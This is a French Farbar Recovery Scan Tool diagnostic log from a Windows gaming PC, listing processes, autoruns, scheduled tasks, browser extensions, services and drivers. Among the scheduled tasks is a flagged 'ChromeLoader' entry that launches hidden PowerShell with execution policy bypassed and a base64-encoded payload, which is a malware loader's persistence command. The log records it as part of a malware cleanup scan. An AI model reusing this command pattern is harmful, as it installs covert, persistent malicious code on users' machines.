Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021 Exécuté par Shadow (administrateur) sur KARDINALLAPTOP (Blade Shadow Computer) (09-01-2022 18:35:43) Exécuté depuis C:\Users\Shadow\Downloads Profils chargés: Shadow Plate-forme: Microsoft Windows 10 Famille Version 21H1 19043.1415 (X64) Langue: Anglais (Royaume-Uni) -> Français (France) Navigateur par défaut: Opera Mode d'amorçage: Normal ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe (BattlEye Innovations e.K. -> ) C:\Program Files (x86)\Common Files\BattlEye\BEService.exe (BattlEye Innovations e.K. -> BattlEye Innovations) C:\R6S\Tom Clancy's Rainbow Six Siege\rainbowsix_be.exe (Blade -> ) [Fichier non signé] C:\Program Files\Blade SAS\ShadowSerial\ShadowSerial.exe <2> (Blade -> ) C:\Program Files\Blade Group\ShadowManager\ShadowManager.exe (Blade -> ) C:\Program Files\Blade Group\ShadowOperator\ShadowOperator.exe (Blade -> ) C:\Program Files\Blade Group\ShadowProcessator\shadow_crash.exe (Blade -> ) C:\Program Files\Blade Group\ShadowServicesWatcher\ShadowServicesWatcher.exe (Blade -> ) C:\Program Files\Blade Group\ShadowSystemWatcher\ShadowSystemWatcher.exe (Blade -> Blade Group) C:\Program Files\Blade Group\ShadowStreamer\ShadowStreamer.exe <2> (Blade -> Blade) C:\Program Files\Blade Group\ShadowProcessator\ShadowProcessator.exe (Blade Group) [Fichier non signé] C:\Program Files\Blade Group\ShadowUsbOverIp\ShadowUsbOverIp.exe (DeepL GmbH -> DeepL GmbH) C:\Users\Shadow\AppData\Local\DeepL\app-3.1.13276\DeepL.exe (DeepL GmbH -> The CefSharp Authors) 
C:\Users\Shadow\AppData\Local\DeepL\app-3.1.13276\CefSharp.BrowserSubprocess.exe <3> (Discord Inc. -> Discord Inc.) C:\Users\Shadow\AppData\Local\Discord\app-1.0.9003\Discord.exe <12> (Element 5 Limited Liability Company -> ELTIMA Software) C:\Program Files\Blade Group\ShadowUsbOverIp\UsbService64.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2110.13603.0_x64__8wekyb3d8bbwe\Cortana.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2110.13603.0_x64__8wekyb3d8bbwe\Win32Bridge.Server.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\msiexec.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCopyAccelerator.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe (Node.js Foundation -> Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\node.exe (Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program 
Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2> (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\Display.NvContainer\NVDisplay.Container.exe <2> (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\NVWMI\nvWmi64.exe <2> (Opera Software AS -> Opera Software) C:\Users\Shadow\AppData\Local\Programs\Opera GX\82.0.4227.50\opera_crashreporter.exe (Opera Software AS -> Opera Software) C:\Users\Shadow\AppData\Local\Programs\Opera GX\opera.exe <14> (Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.187.1.13\OverwolfHelper.exe (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.187.1.13\OverwolfHelper64.exe (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\0.187.1.13\OverwolfBrowser.exe <9> (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\Overwolf.exe (Skutta, Kristjan -> ) D:\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper32.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft) C:\R6S\Tom Clancy's Rainbow Six Siege\RainbowSix.exe (Ubisoft Entertainment Sweden AB -> Ubisoft) D:\Ubisoft Game Launcher\UbisoftGameLauncher.exe (Ubisoft Entertainment Sweden AB -> Ubisoft) D:\Ubisoft Game Launcher\upc.exe (Ubisoft Entertainment Sweden AB -> Ubisoft) D:\Ubisoft Game Launcher\UplayWebCore.exe <8> (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7> (Valve Corp. 
-> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe ==================== Registre (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706344 2021-09-27] (Oracle America, Inc. -> Oracle Corporation) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4267432 2021-12-16] (Valve Corp. -> Valve Corporation) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Discord] => C:\Users\Shadow\AppData\Local\Discord\Update.exe [1512608 2021-09-21] (Discord Inc. -> GitHub) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (Pas de fichier) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [WallpaperEngine] => D:\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper32.exe [2703520 2021-12-04] (Skutta, Kristjan -> ) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [144008 2019-10-22] (Adobe Inc. -> Adobe Systems Incorporated) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [1802072 2021-12-15] (Overwolf Ltd -> Overwolf Ltd.) 
HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [DeepL] => C:\Users\Shadow\AppData\Local\DeepL\app-3.1.13276\DeepL.exe [141360 2021-12-16] (DeepL GmbH -> DeepL GmbH) HKU\S-1-5-21-562984153-1162597116-1858956116-1001\...\Run: [Opera GX Stable] => C:\Users\Shadow\AppData\Local\Programs\Opera GX\launcher.exe [2192592 2021-12-22] (Opera Software AS -> Opera Software) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\97.0.4692.71\Installer\chrmstp.exe [2022-01-07] (Google LLC -> Google LLC) Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION ==================== Tâches planifiées (Avec liste blanche) ============ (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {0273540E-8940-48C0-BFF0-1EE2A69D795A} - System32\Tasks\Opera GX scheduled Autoupdate 1641679505 => C:\Users\Shadow\AppData\Local\Programs\Opera GX\launcher.exe [2192592 2021-12-22] (Opera Software AS -> Opera Software) Task: {06A8C35E-D840-435B-82A5-C1085AF272C9} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [904904 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {10A3AD6D-A33E-4354-A4AF-7AE7898A2849} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-19] (Google LLC -> Google LLC) Task: {1F8E2B3F-BEB9-4CB3-B41F-CA2DBF371686} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {2E2AEBF4-F0DC-4B74-8E3E-3D901306A5E5} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2484056 2021-12-15] (Overwolf Ltd -> 
Overwolf LTD) Task: {2E998F90-BDC5-4EF5-A380-12E40B55198A} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {3F6166C6-09C5-4C23-B1D8-F0518F6D74F5} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [904904 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {67B74884-5131-42B4-A2C6-63F0DB1CD906} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {706A547B-98E4-4779-953F-33BB45107713} - System32\Tasks\Paranoid-SafetyNet => PowerShell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Blade Group\ShadowInstallerClone\paranoid-script.ps1" Task: {772ECC21-ABF1-424D-8C37-8C353B968CA0} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-562984153-1162597116-1858956116-500 => C:\Users\Shadow\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (Pas de fichier) Task: {7A518F63-24AF-4A26-A588-AE315639C1C4} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-11-16] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {9300308D-C7D6-4228-9965-E41B1B41977D} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3341312 2021-12-09] (Nvidia Corporation -> NVIDIA Corporation) Task: {9ECD7178-5F8D-4BDA-A3DB-485717166FBA} - System32\Tasks\ChromeLoader => cmd 
/c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus). (Pas de fichier) <==== ATTENTION Task: {A22471F1-0558-4A00-B6AF-19ACA0083ECB} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {A8CA996E-9EE4-4508-B735-152C75A7EAE9} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {B9E1AB13-995B-47BD-8215-5F034AC3FDE0} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649216 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {C53F6145-5C69-41EF-B33C-28465902F644} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-19] (Google LLC -> Google LLC) Task: {CA98769F-6535-46CB-BE4B-3347FCC283CD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {CB8BD936-9E72-465A-A18C-AD0701A10D2E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048
2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {D1F0B2B1-2B21-4B2C-934C-7D6B1062BBBC} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Tcpip\Parameters: [DhcpNameServer] 85.190.65.41 85.190.66.41 Tcpip\..\Interfaces\{54142b4c-e434-4619-98df-e88b7604a025}: [DhcpNameServer] 85.190.65.41 85.190.66.41 Edge: ======= Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)] Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)] Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)] Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)] Edge Profile: C:\Users\Shadow\AppData\Local\Microsoft\Edge\User Data\Default [2021-12-05] FireFox: ======== FF Plugin: @java.com/DTPlugin,version=11.311.2 -> C:\Program Files\Java\jre1.8.0_311\bin\dtplugin\npDeployJava1.dll [2021-11-07] (Oracle America, Inc. 
-> Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.311.2 -> C:\Program Files\Java\jre1.8.0_311\bin\plugin2\npjp2.dll [2021-11-07] (Oracle America, Inc. -> Oracle Corporation) Chrome: ======= CHR Profile: C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default [2022-01-08] CHR Notifications: Default -> CHR HomePage: Default ->
hxxps://kali.org/ CHR StartupUrls: Default -> "hxxps://sitejeune.laregion.fr/" CHR Session Restore: Default -> est activé. CHR Extension: (Slides) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-10-19] CHR Extension: (Earth and Moon) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\afmfhbdfjlfminjglfhcgcblgicnfcka [2021-10-19] CHR Extension: (Docs) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-10-19] CHR Extension: (Google Drive) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-10-19] CHR Extension: (MEGA) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2021-12-24] CHR Extension: (YouTube) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-10-19] CHR Extension: (Gitpod - Always ready to code) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\dodmmooeoklaejobgleioelladacbeki [2021-10-19] CHR Extension: (Sheets) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-10-19] CHR Extension: (Google Docs hors connexion) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-11-30] CHR Extension: (AdBlock — le meilleur bloqueur de pubs) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2022-01-07] CHR Extension: (Instant Gaming) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbnoedlobifdhbpjkcfhcbdcjhampmne [2022-01-07] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-10-19] CHR Extension: 
(Gmail) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-10-19] CHR Extension: (Options) - C:\Users\Shadow\AppData\Local [2022-01-09] CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb] CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp] Opera: ======= StartMenuInternet: (HKU\S-1-5-21-562984153-1162597116-1858956116-1001) Opera GXStable - "C:\Users\Shadow\AppData\Local\Programs\Opera GX\Launcher.exe" ==================== Services (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8912272 2021-11-29] (BattlEye Innovations e.K. -> ) S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [784512 2021-12-03] (EasyAntiCheat Oy -> EasyAntiCheat Ltd) S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-11-01] (Epic Games Inc. -> Epic Games, Inc.) R2 NVWMI; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\NVWMI\nvWmi64.exe [4465592 2021-12-15] (Nvidia Corporation -> NVIDIA Corporation) S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2484056 2021-12-15] (Overwolf Ltd -> Overwolf LTD) S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2017072 2021-11-29] (Rockstar Games, Inc. 
-> Rockstar Games) R2 ShadowManager; C:\Program Files\Blade Group\ShadowManager\ShadowManager.exe [379816 2021-04-20] (Blade -> ) R2 ShadowOperator; C:\Program Files\Blade Group\ShadowOperator\ShadowOperator.exe [129448 2021-04-22] (Blade -> ) R2 ShadowProcessator; C:\Program Files\Blade Group\ShadowProcessator\ShadowProcessator.exe [6651312 2021-05-04] (Blade -> Blade) R2 ShadowSerial; C:\Program Files\Blade SAS\ShadowSerial\ShadowSerial.exe [363496 2019-09-17] (Blade -> ) [Fichier non signé] R2 ShadowServicesWatcher; C:\Program Files\Blade Group\ShadowServicesWatcher\ShadowServicesWatcher.exe [52664 2021-04-26] (Blade -> ) R2 ShadowStreamer; C:\Program Files\Blade Group\ShadowStreamer\ShadowStreamer.exe [5336368 2021-06-07] (Blade -> Blade Group) R2 ShadowSystemWatcher; C:\Program Files\Blade Group\ShadowSystemWatcher\ShadowSystemWatcher.exe [72120 2021-04-26] (Blade -> ) R2 ShadowUsbOverIp; C:\Program Files\Blade Group\ShadowUsbOverIp\ShadowUsbOverIp.exe [65024 2020-02-27] (Blade Group) [Fichier non signé] S3 tvnserver; C:\Program Files\TightVNC\tvnserver.exe [1805936 2019-10-15] (GlavSoft LLC -> GlavSoft LLC.) 
R2 UsbService; C:\Program Files\Blade Group\ShadowUsbOverIp\UsbService64.exe [4266176 2020-02-27] (Element 5 Limited Liability Company -> ELTIMA Software) S3 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746688 2021-04-28] (Oracle Corporation -> Oracle Corporation) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem ===================== Pilotes (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R3 BEDaisy; C:\Program Files (x86)\Common Files\BattlEye\BEDaisy.sys [3383944 2022-01-09] (BattlEye Innovations e.K. 
-> ) R3 BladeSysVirtHID; C:\Windows\System32\drivers\BladeSysVirtHID.sys [22040 2020-03-06] (Blade -> Windows (R) Win 7 DDK provider) S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé] R3 ELTIMA_USB_HUB_FILTER; C:\Windows\System32\drivers\fusbhub.sys [130744 2020-02-27] (Element 5 Limited Liability Company -> ELTIMA Software) R3 eustub; C:\Windows\System32\drivers\eusbstub.sys [39608 2020-02-27] (Element 5 Limited Liability Company -> ELTIMA Software) R3 FwCfg; C:\Windows\System32\drivers\fwcfg.sys [31200 2020-11-20] (Blade SAS -> Red Hat, Inc.) R3 netkvm; C:\Windows\System32\drivers\netkvm.sys [143048 2019-04-12] (Red Hat, Inc. -> Red Hat, Inc.) R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation) R2 ShadowVirtualStorage; C:\Windows\System32\DRIVERS\ShadowVirtualStorage.sys [78936 2021-03-15] (Blade SAS -> Windows (R) Win 7 DDK provider) R3 sysvad_bladeaudio; C:\Windows\System32\drivers\BladeAudio.sys [95200 2020-12-24] (Blade SAS -> Windows (R) Win 7 DDK provider) S3 UniFairy_x64; C:\Windows\system32\drivers\UniFairy_x64.sys [4777952 2021-10-18] (Tencent Technology(Shenzhen) Company Limited -> TENCENT) S3 unirsdt; C:\Windows\system32\drivers\unirsdt.sys [3314472 2021-10-18] (Tencent Technology(Shenzhen) Company Limited -> TENCENT) S3 VBAudioVMVAIOMME; C:\Windows\System32\drivers\vbaudio_vmvaio64_win10.sys [71712 2021-10-19] (Vincent Burel -> Windows (R) Win 7 DDK provider) R3 VBoxNetAdp; C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys [239616 2021-04-28] (Oracle Corporation -> Oracle Corporation) R1 VBoxNetLwf; C:\Windows\system32\DRIVERS\VBoxNetLwf.sys [249536 2021-04-28] (Oracle Corporation -> Oracle Corporation) R3 ViGEmBus; C:\Windows\System32\drivers\ViGEmBus.sys [70104 
2020-03-06] (Blade -> Benjamin Höglinger-Stelzer) R0 vioscsi; C:\Windows\System32\drivers\vioscsi.sys [63688 2019-04-12] (Red Hat, Inc. -> Red Hat, Inc.) R3 VirtioSerial; C:\Windows\System32\drivers\vioser.sys [74952 2019-04-12] (Red Hat, Inc. -> Red Hat, Inc.) R3 vjoy; C:\Windows\System32\drivers\vjoy.sys [67448 2019-07-14] (On-site Dental Systems (Justin Shafer) -> Shaul Eizikovich) S3 VOICEMOD_Driver; C:\Windows\system32\drivers\vmdrv.sys [45408 2018-01-10] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider) R3 vuhub; C:\Windows\System32\drivers\vuhub.sys [145080 2020-02-27] (Element 5 Limited Liability Company -> ELTIMA Software) S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [48536 2021-12-15] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [435432 2021-12-15] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-15] (Microsoft Windows -> Microsoft Corporation) R3 WinRing0_1_2_0; C:\Program Files\Blade Group\ShadowSystemWatcher\OpenHardwareMonitorLib.sys [14544 2022-01-09] (Noriyuki MIYAZAKI -> OpenLibSys.org) S3 xhunter1; C:\Windows\xhunter1.sys [2719256 2021-11-12] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.) S3 VBAudioVMAUXVAIOMME; \SystemRoot\System32\drivers\vbaudio_vmauxvaio64_win10.sys [X] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois (créés) (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 
2022-01-09 18:35 - 2022-01-09 18:36 - 000031666 _____ C:\Users\Shadow\Downloads\FRST.txt 2022-01-08 23:05 - 2022-01-08 23:05 - 000004246 _____ C:\Windows\system32\Tasks\Opera GX scheduled Autoupdate 1641679505 2022-01-08 23:05 - 2022-01-08 23:05 - 000001431 _____ C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navigateur Opera GX.lnk 2022-01-08 23:05 - 2022-01-08 23:05 - 000000000 ____D C:\Users\Shadow\AppData\Local\Opera Software 2022-01-08 23:04 - 2022-01-08 23:04 - 003357424 _____ (Opera Software) C:\Users\Shadow\Downloads\OperaGXSetup.exe 2022-01-08 23:04 - 2022-01-08 23:04 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Opera Software 2022-01-08 16:41 - 2022-01-08 16:41 - 000000008 __RSH C:\ProgramData\ntuser.pol 2022-01-08 16:39 - 2022-01-08 16:40 - 000002025 _____ C:\Users\Shadow\Downloads\Fixlog.txt 2022-01-08 15:58 - 2022-01-09 18:36 - 000000000 ____D C:\FRST 2022-01-08 15:57 - 2022-01-08 15:57 - 002311168 _____ (Farbar) C:\Users\Shadow\Downloads\FRST64.exe 2022-01-07 22:29 - 2022-01-07 22:29 - 000000221 _____ C:\Users\Shadow\Desktop\The Elder Scrolls V Skyrim.url 2022-01-07 22:03 - 2022-01-07 22:03 - 000000000 ____D C:\Users\Shadow\AppData\Local\chrome 2022-01-07 22:02 - 2022-01-07 22:02 - 000012828 _____ C:\Windows\system32\Tasks\ChromeLoader 2022-01-07 21:49 - 2022-01-07 21:49 - 002326679 